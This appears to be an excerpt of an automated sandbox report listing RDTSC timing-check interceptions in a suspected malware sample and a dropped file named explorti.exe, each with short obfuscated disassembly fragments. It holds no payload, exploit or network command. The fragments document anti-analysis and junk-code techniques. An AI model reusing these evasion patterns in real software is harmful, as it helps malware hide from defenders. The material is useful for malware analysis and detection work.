Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C8074E second address: 4C80752 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80752 second address: 4C80758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80758 second address: 4C80794 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD1807ED54Ch 0x00000009 adc si, 62A8h 0x0000000e jmp 00007FD1807ED54Bh 0x00000013 popfd 0x00000014 push esi 0x00000015 pop edi 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esp], ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FD1807ED551h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80794 second address: 4C80799 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C20227 second address: 4C20253 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FD1807ED553h 0x00000012 pop eax 0x00000013 mov ecx, edx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C20253 second address: 4C202B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD180B5C160h 0x00000008 push ecx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f jmp 00007FD180B5C15Dh 0x00000014 pushfd 0x00000015 jmp 00007FD180B5C160h 0x0000001a xor cl, 00000008h 0x0000001d jmp 00007FD180B5C15Bh 0x00000022 popfd 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FD180B5C165h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C202B3 second address: 4C202B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C202B9 second address: 4C202BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C202BD second address: 4C202CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushad 0x0000000c mov dh, 9Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80BB0 second address: 4C80BDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C160h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD180B5C167h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80BDF second address: 4C80C2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD1807ED54Fh 0x00000009 sbb eax, 44BDDF1Eh 0x0000000f jmp 00007FD1807ED559h 0x00000014 popfd 0x00000015 jmp 00007FD1807ED550h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 pop esi 0x00000023 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80C2B second address: 4C80C88 instructions: 0x00000000 rdtsc 0x00000002 mov bx, 4A3Ah 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movsx edx, ax 0x0000000e mov ecx, 72B097BFh 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 movzx ecx, di 0x0000001a movsx edx, ax 0x0000001d popad 0x0000001e push dword ptr [ebp+0Ch] 0x00000021 pushad 0x00000022 popad 0x00000023 push dword ptr [ebp+08h] 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FD180B5C15Fh 0x0000002f xor esi, 392953EEh 0x00000035 jmp 00007FD180B5C169h 0x0000003a popfd 0x0000003b movzx ecx, dx 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80C88 second address: 4C80CA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD1807ED559h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80CA5 second address: 4C80D4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call 00007FD180B5C159h 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FD180B5C163h 0x00000017 adc cx, 0C0Eh 0x0000001c jmp 00007FD180B5C169h 0x00000021 popfd 0x00000022 popad 0x00000023 push eax 0x00000024 pushad 0x00000025 pushad 0x00000026 mov dl, 3Dh 0x00000028 mov cx, BAA5h 0x0000002c popad 0x0000002d mov edx, ecx 0x0000002f popad 0x00000030 mov eax, dword ptr [esp+04h] 0x00000034 jmp 00007FD180B5C167h 0x00000039 mov eax, dword ptr [eax] 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e mov edx, esi 0x00000040 pushfd 0x00000041 jmp 00007FD180B5C15Eh 0x00000046 and si, 2018h 0x0000004b jmp 00007FD180B5C15Bh 0x00000050 popfd 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80D4A second address: 4C80D94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007FD1807ED54Bh 0x0000000b xor ax, 44DEh 0x00000010 jmp 00007FD1807ED559h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d pushad 0x0000001e mov ecx, edx 0x00000020 mov bh, 8Ah 0x00000022 popad 0x00000023 pop eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 movsx ebx, ax 0x0000002a mov ecx, 74DB3F8Fh 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80D94 second address: 4C80D9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80DAE second address: 4C80DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80DB2 second address: 4C80DB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80DB8 second address: 4C80DDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED557h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 movzx eax, al 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80DDC second address: 4C80DF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C167h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80DF7 second address: 4C80DFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80DFD second address: 4C80E19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FD180B5C15Fh 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80E19 second address: 4C80E31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD1807ED554h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C30660 second address: 4C30666 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C30666 second address: 4C30686 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push FFFFFFFEh 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD1807ED554h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C30686 second address: 4C306CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007FD180B5C159h 0x0000000e pushad 0x0000000f mov ecx, 75AAF68Bh 0x00000014 pushfd 0x00000015 jmp 00007FD180B5C160h 0x0000001a sub eax, 273A9698h 0x00000020 jmp 00007FD180B5C15Bh 0x00000025 popfd 0x00000026 popad 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C306CF second address: 4C306D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C306D3 second address: 4C306D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C306D9 second address: 4C306DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C306DE second address: 4C3070F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FD180B5C162h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD180B5C15Eh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C3070F second address: 4C30721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD1807ED54Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C30721 second address: 4C3078F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007FD180B5C169h 0x00000014 pop eax 0x00000015 jmp 00007FD180B5C15Eh 0x0000001a push 41C039FBh 0x0000001f pushad 0x00000020 mov dl, BBh 0x00000022 mov di, si 0x00000025 popad 0x00000026 xor dword ptr [esp], 373097FBh 0x0000002d jmp 00007FD180B5C162h 0x00000032 mov eax, dword ptr fs:[00000000h] 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C3078F second address: 4C307AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C307AC second address: 4C307BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD180B5C15Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C307BC second address: 4C30888 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d push ecx 0x0000000e mov bh, A4h 0x00000010 pop eax 0x00000011 movsx edx, si 0x00000014 popad 0x00000015 push eax 0x00000016 jmp 00007FD1807ED54Fh 0x0000001b nop 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FD1807ED554h 0x00000023 sbb esi, 0BB028C8h 0x00000029 jmp 00007FD1807ED54Bh 0x0000002e popfd 0x0000002f push eax 0x00000030 jmp 00007FD1807ED54Fh 0x00000035 pop eax 0x00000036 popad 0x00000037 sub esp, 1Ch 0x0000003a jmp 00007FD1807ED54Fh 0x0000003f xchg eax, ebx 0x00000040 jmp 00007FD1807ED556h 0x00000045 push eax 0x00000046 jmp 00007FD1807ED54Bh 0x0000004b xchg eax, ebx 0x0000004c jmp 00007FD1807ED556h 0x00000051 xchg eax, esi 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FD1807ED557h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C30888 second address: 4C30918 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD180B5C15Fh 0x00000008 pop eax 0x00000009 mov bx, 048Ch 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jmp 00007FD180B5C162h 0x00000016 xchg eax, esi 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FD180B5C15Eh 0x0000001e add ch, FFFFFFD8h 0x00000021 jmp 00007FD180B5C15Bh 0x00000026 popfd 0x00000027 pushfd 0x00000028 jmp 00007FD180B5C168h 0x0000002d sub cx, C238h 0x00000032 jmp 00007FD180B5C15Bh 0x00000037 popfd 0x00000038 popad 0x00000039 xchg eax, edi 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FD180B5C165h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C30918 second address: 4C3098D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 movsx edi, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FD1807ED54Bh 0x00000013 jmp 00007FD1807ED553h 0x00000018 popfd 0x00000019 jmp 00007FD1807ED558h 0x0000001e popad 0x0000001f xchg eax, edi 0x00000020 jmp 00007FD1807ED550h 0x00000025 mov eax, dword ptr [76FBB370h] 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FD1807ED557h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C3098D second address: 4C309BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [ebp-08h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD180B5C15Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C309BC second address: 4C309C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C309C2 second address: 4C309C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C309C6 second address: 4C30A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor eax, ebp 0x0000000a pushad 0x0000000b mov ebx, esi 0x0000000d mov ebx, ecx 0x0000000f popad 0x00000010 nop 0x00000011 jmp 00007FD1807ED558h 0x00000016 push eax 0x00000017 jmp 00007FD1807ED54Bh 0x0000001c nop 0x0000001d jmp 00007FD1807ED556h 0x00000022 lea eax, dword ptr [ebp-10h] 0x00000025 pushad 0x00000026 movzx esi, dx 0x00000029 jmp 00007FD1807ED553h 0x0000002e popad 0x0000002f mov dword ptr fs:[00000000h], eax 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C30A39 second address: 4C30A54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C167h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C30A54 second address: 4C30A93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c jmp 00007FD1807ED54Eh 0x00000011 mov eax, dword ptr [esi+10h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FD1807ED54Ah 0x0000001d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C30A93 second address: 4C30A99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C30A99 second address: 4C30ADD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c mov esi, 121E68CDh 0x00000011 jmp 00007FD1807ED54Ah 0x00000016 popad 0x00000017 jne 00007FD1F2A7C7ACh 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FD1807ED557h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C30ADD second address: 4C30AE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C30AE3 second address: 4C30B5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub eax, eax 0x0000000d pushad 0x0000000e movsx ebx, si 0x00000011 mov dx, cx 0x00000014 popad 0x00000015 mov dword ptr [ebp-20h], eax 0x00000018 jmp 00007FD1807ED558h 0x0000001d mov ebx, dword ptr [esi] 0x0000001f jmp 00007FD1807ED550h 0x00000024 mov dword ptr [ebp-24h], ebx 0x00000027 jmp 00007FD1807ED550h 0x0000002c test ebx, ebx 0x0000002e jmp 00007FD1807ED550h 0x00000033 je 00007FD1F2A7C673h 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C30B5C second address: 4C30B60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C30B60 second address: 4C30B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C30B66 second address: 4C30BA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C164h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp ebx, FFFFFFFFh 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FD180B5C15Eh 0x00000013 or ecx, 4C458CF8h 0x00000019 jmp 00007FD180B5C15Bh 0x0000001e popfd 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C300CF second address: 4C300D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C300D5 second address: 4C3010C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD180B5C166h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FD180B5C15Ah 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 503940 second address: 503944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 503A9C second address: 503AA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 503AA2 second address: 503AA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 503AA8 second address: 503ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD180B5C166h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 503ACB second address: 503AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 503F03 second address: 503F07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 503F07 second address: 503F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 503F10 second address: 503F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD180B5C162h 0x00000009 jnl 00007FD180B5C156h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD180B5C162h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 503F43 second address: 503F54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnp 00007FD1807ED546h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 50651C second address: 50658B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov si, dx 0x0000000f push 00000000h 0x00000011 and ch, 0000003Bh 0x00000014 push 943A65A8h 0x00000019 pushad 0x0000001a push ebx 0x0000001b jl 00007FD180B5C156h 0x00000021 pop ebx 0x00000022 push edx 0x00000023 jmp 00007FD180B5C164h 0x00000028 pop edx 0x00000029 popad 0x0000002a add dword ptr [esp], 6BC59AD8h 0x00000031 sub esi, 5594CB6Dh 0x00000037 push 00000003h 0x00000039 add dh, 0000000Dh 0x0000003c push 00000000h 0x0000003e mov ecx, dword ptr [ebp+122D2CC3h] 0x00000044 push 00000003h 0x00000046 pushad 0x00000047 cmc 0x00000048 mov ebx, dword ptr [ebp+122D2997h] 0x0000004e popad 0x0000004f push 499A4006h 0x00000054 push eax 0x00000055 push edx 0x00000056 push edx 0x00000057 pushad 0x00000058 popad 0x00000059 pop edx 0x0000005a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 50670F second address: 506713 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 506713 second address: 506736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FD180B5C169h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 506736 second address: 506759 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED556h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 506759 second address: 50675D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 50675D second address: 506761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
